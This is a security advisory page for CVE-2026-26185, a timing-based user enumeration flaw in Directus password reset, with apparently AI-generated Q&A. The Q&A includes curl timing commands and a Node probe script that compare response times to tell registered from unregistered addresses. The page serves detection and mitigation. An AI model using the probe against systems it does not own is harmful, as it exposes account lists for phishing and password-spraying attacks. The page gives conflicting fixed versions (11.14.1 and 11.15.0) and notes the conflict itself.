CVE-2026-26185
Timing-Based User Enumeration in Directus Password Reset Function
Publication date: 2026-02-12
Last updated on: 2026-02-20
Assigner: GitHub, Inc.
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| monospace | directus | versions before 11.15.0 (11.15.0 itself excluded) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-203 | The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Directus versions before 11.14.1 and involves the password reset functionality. It is a timing-based user enumeration flaw (CWE-203): when a password reset is requested with an invalid reset_url, the response time differs by roughly 500 milliseconds depending on whether the account named in the request exists. Because the gap is large and consistent, an attacker who can reach the password reset endpoint can reliably determine whether a given user exists, without needing any credentials.
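The following is an illustrative model of how such a leak arises and how the handler ordering is usually hardened. It is added example code written for this page, not Directus source, and it does not claim to reproduce the project's real code path: the user table, the reset-URL allow list, and the per-step costs are constructed assumptions, and the expensive steps are recorded in a trace rather than executed so the two orderings can be compared deterministically.

```javascript
// Illustrative model of a timing leak in a password-reset request handler.
// Hypothetical code for this page, not Directus source. Costly steps are
// recorded in a trace instead of being run.

// Constructed sample data: one known account and an assumed allow list
// of reset URLs the instance accepts.
const USERS = new Set(["alice@example.com"]);
const RESET_URL_ALLOW_LIST = ["https://app.example.com/reset"];
const OUTBOX = []; // messages actually handed to delivery (server-side only)

// Assumed cost of each step in milliseconds; token + mail add up to the
// roughly 500 ms gap the advisory describes.
const COST_MS = { lookupUser: 5, validateResetUrl: 1, issueToken: 250, sendMail: 250 };

// Vulnerable ordering: look the user up first and return early when the
// account is unknown. reset_url validation and the expensive work therefore
// only run for existing accounts, so an invalid reset_url yields a different
// status *and* a different response time depending on existence.
function requestResetVulnerable(email, resetUrl) {
  const trace = ["lookupUser"];
  if (!USERS.has(email)) {
    return { status: 200, trace }; // fast path: leaks "no such user" via timing
  }
  trace.push("validateResetUrl");
  if (!RESET_URL_ALLOW_LIST.includes(resetUrl)) {
    return { status: 400, trace }; // this branch is reachable only for real users
  }
  trace.push("issueToken", "sendMail");
  return { status: 200, trace };
}

// Hardened ordering: validate attacker-controlled input before touching the
// user table, then run the same steps whether or not the account exists.
// "sendMail" here means handing the message to an outbound queue; the queue
// drops it for unknown accounts, off the request path, so the response
// and its timing are identical in both cases.
function requestResetHardened(email, resetUrl) {
  const trace = ["validateResetUrl"];
  if (!RESET_URL_ALLOW_LIST.includes(resetUrl)) {
    return { status: 400, trace }; // identical for every email address
  }
  trace.push("lookupUser");
  const exists = USERS.has(email);
  trace.push("issueToken", "sendMail");
  if (exists) OUTBOX.push(email); // O(1) decision, no observable cost difference
  return { status: 200, trace };
}

// Approximate response time implied by a trace, in milliseconds.
function estimatedMs(trace) {
  return trace.reduce((sum, step) => sum + COST_MS[step], 0);
}

// Demonstration: compare both orderings for a known and an unknown address.
for (const email of ["alice@example.com", "nobody@example.com"]) {
  const v = requestResetVulnerable(email, "https://evil.invalid/reset");
  const h = requestResetHardened(email, "https://evil.invalid/reset");
  console.log(email, "vulnerable:", v.status, estimatedMs(v.trace) + "ms",
              "hardened:", h.status, estimatedMs(h.trace) + "ms");
}
```

With an invalid reset_url the vulnerable handler answers 200 after about 5 ms for an unknown address but 400 after about 6 ms for a real one; with a valid reset_url it answers 200 in both cases but the real account costs about 500 ms more. The hardened ordering returns the same status and runs the same steps regardless of the address.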
How can this vulnerability impact me?
The vulnerability lets an unauthenticated attacker enumerate valid accounts by timing password reset requests. Beyond revealing which e-mail addresses are registered (a privacy concern in itself), a confirmed list of users makes follow-on attacks such as targeted phishing, password spraying or brute-force attempts against those accounts more effective.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by timing the password reset request endpoint. Send reset requests that carry an invalid reset_url for an e-mail address you know exists and for one you know does not, several times each, and compare the response times: a consistent gap of roughly 500 ms between the two cases indicates the vulnerable behaviour. Repeat each measurement and compare medians rather than single readings, since network jitter on one request can easily exceed the signal.
To test this, use curl (or any HTTP client) to send password reset requests and time them. Directus accepts reset requests as a POST to /auth/password/request with a JSON body containing email and reset_url; the hostname, e-mail addresses and reset_url below are placeholders, and the reset_url is deliberately one the instance would not accept (for example a host that is not on its configured reset URL allow list):
- curl -s -o /dev/null -w "%{http_code} %{time_total}\n" -X POST -H "Content-Type: application/json" -d '{"email":"known-user@example.com","reset_url":"https://not-allowed.invalid/reset"}' "https://your-directus-instance.com/auth/password/request"
- curl -s -o /dev/null -w "%{http_code} %{time_total}\n" -X POST -H "Content-Type: application/json" -d '{"email":"unknown-user@example.com","reset_url":"https://not-allowed.invalid/reset"}' "https://your-directus-instance.com/auth/password/request"
Run each command several times and compare the median time_total values; a consistent difference of about 500 ms between the known and the unknown address suggests the vulnerability is present. Compare the status codes as well, since a different response code for existing accounts would be an even more direct leak.
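The measurement above, automated as a small probe that interleaves requests and compares medians. This is an added example, not Directus code or a tool shipped with it. It assumes the Directus password reset request endpoint (POST /auth/password/request with a JSON body of email and reset_url); the base URL, the two addresses, the non-allow-listed reset_url and the 300 ms decision threshold are placeholders to adjust. Requires Node 18 or later for the global fetch.

```javascript
// Timing probe for password-reset user enumeration. Added example for this
// page; not part of Directus. Assumes POST /auth/password/request accepting
// a JSON body {email, reset_url}. Endpoint, addresses and threshold are
// assumptions to adjust for the target.

function median(values) {
  const sorted = [...values].sort((a, b) => a - b);
  const mid = Math.floor(sorted.length / 2);
  return sorted.length % 2 ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2;
}

// Compare two sets of response times (ms). Medians are used instead of single
// requests because jitter on one request can exceed the ~500 ms signal.
function timingGap(existingMs, unknownMs, thresholdMs = 300) {
  const existingMedian = median(existingMs);
  const unknownMedian = median(unknownMs);
  const gap = existingMedian - unknownMedian;
  return { existingMedian, unknownMedian, gap, vulnerable: Math.abs(gap) >= thresholdMs };
}

// Send one reset request with the given reset_url and return its latency (ms).
// The clock stops only after the whole body has been read.
async function timeResetRequest(baseUrl, email, resetUrl) {
  const started = performance.now();
  const res = await fetch(new URL("/auth/password/request", baseUrl), {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ email, reset_url: resetUrl }),
  });
  await res.arrayBuffer();
  return performance.now() - started;
}

// Interleave known/unknown requests so that server load changes affect both
// sample sets equally, then compare the medians.
async function probe(baseUrl, knownEmail, unknownEmail, rounds = 10) {
  const invalidResetUrl = "https://not-on-the-allow-list.invalid/reset"; // assumed not accepted
  const existing = [];
  const unknown = [];
  for (let i = 0; i < rounds; i++) {
    existing.push(await timeResetRequest(baseUrl, knownEmail, invalidResetUrl));
    unknown.push(await timeResetRequest(baseUrl, unknownEmail, invalidResetUrl));
  }
  return timingGap(existing, unknown);
}

// CLI entry point: node probe.js <base-url> <known-email> <unknown-email>
if (typeof process !== "undefined" && process.argv.length >= 5) {
  probe(process.argv[2], process.argv[3], process.argv[4])
    .then((result) => console.log(JSON.stringify(result, null, 2)))
    .catch((err) => { console.error(err); process.exitCode = 1; });
}
```

Run it as node probe.js https://your-directus-instance.com known-user@example.com unknown-user@example.com; a result with vulnerable: true and a gap of roughly 500 ms matches the behaviour this advisory describes. Use an unknown address that is certainly unregistered, or a registered account you control, so the two sample sets are truly different classes.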
What immediate steps should I take to mitigate this vulnerability?
The immediate step is to upgrade Directus to version 11.14.1 or later, where this timing-based user enumeration in the password reset functionality is reported fixed. Note that the affected-products table on this page lists versions before 11.15.0 as affected, so verify the exact fixed release against the vendor's advisory before relying on 11.14.1. Until the upgrade is in place, rate limiting the password reset endpoint reduces how quickly an attacker can enumerate accounts but does not remove the timing difference itself.